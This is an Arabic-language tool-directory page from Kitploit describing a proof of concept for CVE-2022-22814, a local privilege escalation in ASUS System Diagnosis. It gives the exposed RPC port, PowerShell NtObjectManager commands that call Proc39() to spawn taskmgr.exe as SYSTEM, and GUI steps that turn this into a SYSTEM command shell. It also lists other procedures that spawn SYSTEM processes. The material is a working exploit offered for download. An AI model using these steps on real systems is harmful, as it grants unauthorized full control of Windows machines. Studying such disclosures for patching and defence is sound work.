Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-22814_PoC | Kitploit
أدوات/GitHubGitHub/dshankle/cve-2022-22814_poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقاستغلال الملفات الثنائية
GitHubdshankle/cve-2022-22814_poc

CVE-2022-22814_PoC

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تصعيد الامتيازات - AsusSystemDiagnosis.exe - Proc39()

المسار الكامل: C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe

المشكلة:

منفذ ALPC \RPC Control\ASHWTestServer الذي يعرضه AsusSystemDiagnosis.exe قابل للوصول بالكامل لأي مستخدم. استدعاء Proc39() عبر RPC من خلال هذا المنفذ يقوم بإنشاء عملية taskmgr.exe بصلاحيات SYSTEM في جلسة المستخدم الحالي.

الاستغلال:

باستخدام أداة NtObjectManager RPC من مشروع Project Zero من https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools (تأكد من أخذ الإصدار المُجمّع) يمكن الاتصال بمنفذ RPC الضعيف وعندها يمكن استدعاء Proc39(). بمجرد إنشاء عملية taskmgr.exe بصلاحيات SYSTEM يمكن إنشاء شل cmd.exe باستخدام وظيفة "تشغيل مهمة جديدة" من خلال قائمة السياق، ملف > تشغيل مهمة جديدة > cmd.exe.

NtObjectManager:

root@kitploit:~
$server = get-rpcserver C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe

$client = get-rpcclient $server

$client.connect()

$client.Proc39()

تصعيد الامتيازات - AsusSystemDiagnosis.exe - Proc40()

نفس ما سبق لكنه يقوم بإنشاء mmc.exe بصلاحيات النظام. يمكن إما إنشاء مهمة جديدة أو استخدام وظيفة التصفح لفتح نافذة explorer.exe وتنفيذ cmd.exe من شريط العناوين.

ملاحظات إضافية:

  • Proc53() - يقوم بإنشاء systemreset.exe بصلاحيات SYSTEM
  • Proc54() - يقوم بإنشاء RecoveryDrive.exe بصلاحيات SYSTEM
تنزيل الأداة